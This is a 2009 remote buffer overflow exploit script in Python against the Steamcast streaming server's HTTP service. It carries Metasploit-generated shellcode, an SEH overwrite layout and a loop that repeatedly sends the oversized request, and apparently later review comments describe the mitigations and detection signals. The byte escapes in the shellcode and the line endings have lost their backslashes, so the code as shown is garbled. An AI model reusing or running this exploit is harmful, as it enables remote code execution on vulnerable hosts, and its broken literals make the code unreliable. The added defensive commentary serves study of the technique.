
# Title : Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
# Published : 2009-04-13
# Author : His0k4


#!/usr/bin/python
#[*] Usage   : steamcast.py [victim_ip]
#[*] Bug     : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.        
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Note : The problem is that we need to find a DLL which is not compiled with GS; in my case I found idmmbc, a loaded DLL of Internet Download Manager, so try to find an unsafe DLL.

import sys, socket
import struct

# Target selection: the host comes from the first CLI argument; the service
# port is hard-coded to 8000 (no argument validation, no usage check).
host = sys.argv[1]
port = 8000

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Payload bytes as published; the generator metadata is the line above.
# NOTE(review): in this listing the `\x` escape backslashes appear to have been
# stripped (`x2b`, `xc9`, ...), so these literals are plain ASCII text as shown.
# Left byte-identical on purpose.
shellcode=(
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc6"
"x90xb4x70x83xebxfcxe2xf4x3ax78xf0x70xc6x90x3fx35"
"xfax1bxc8x75xbex91x5bxfbx89x88x3fx2fxe6x91x5fx39"
"x4dxa4x3fx71x28xa1x74xe9x6ax14x74x04xc1x51x7ex7d"
"xc7x52x5fx84xfdxc4x90x74xb3x75x3fx2fxe2x91x5fx16"
"x4dx9cxffxfbx99x8cxb5x9bx4dx8cx3fx71x2dx19xe8x54"
"xc2x53x85xb0xa2x1bxf4x40x43x50xccx7cx4dxd0xb8xfb"
"xb6x8cx19xfbxaex98x5fx79x4dx10x04x70xc6x90x3fx18"
"xfaxcfx85x86xa6xc6x3dx88x45x50xcfx20xaex60x3ex74"
"x99xf8x2cx8ex4cx9exe3x8fx21xf3xd5x1cxa5x90xb4x70")

# Oversized request payload as published: 1003 repeated filler bytes, two 4-byte
# fields, a 20-byte "x90" run, then the shellcode. The title says "(SEH)" and the
# two 4-byte fields are shaped like the usual next-SEH / handler-address pair of
# an SEH overwrite -- that is an inference from the layout, not something this
# file demonstrates. The author's note above says the handler address depends on
# a loaded module that lacks compiler hardening (GS); SafeSEH/SEHOP, DEP and ASLR
# are the mitigations that target exactly this technique.
# Defender's view: well over a kilobyte of a single repeated byte placed where an
# HTTP header line is expected is a straightforward IDS/WAF signature
# (oversized header line, long run of one byte value).
exploit = "x41"*1003 + "xEBx06x90x90" + "xDBx27x02x10" + "x90"*20 + shellcode

# Unbounded loop: every iteration opens a new TCP connection and sends the
# request; the socket is never read from or closed and there is no delay, so a
# run of this script shows up as a rapid stream of new connections from one
# source, each carrying the same oversized GET -- the repeated-connection
# pattern is itself a detectable signal in service or firewall logs.
while 1:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, port))
	# HTTP/1.1 request: request line, Host header, the `exploit` string as a
	# header line, then the terminating blank lines. (The literals read "rn"
	# here rather than a CRLF escape -- presumably the same stripped-backslash
	# garbling noted above.)
	head =  "GET / HTTP/1.1rn"
	head += "Host: "+host+"rn"
	head += exploit+"rn"
	head += "rnrn"

	# `head` is sent as a str with no encoding step -- presumably Python 2 era
	# (2009 shebang /usr/bin/python), where str is a byte string; no response
	# is read and no error from the send is handled.
	s.send(head)
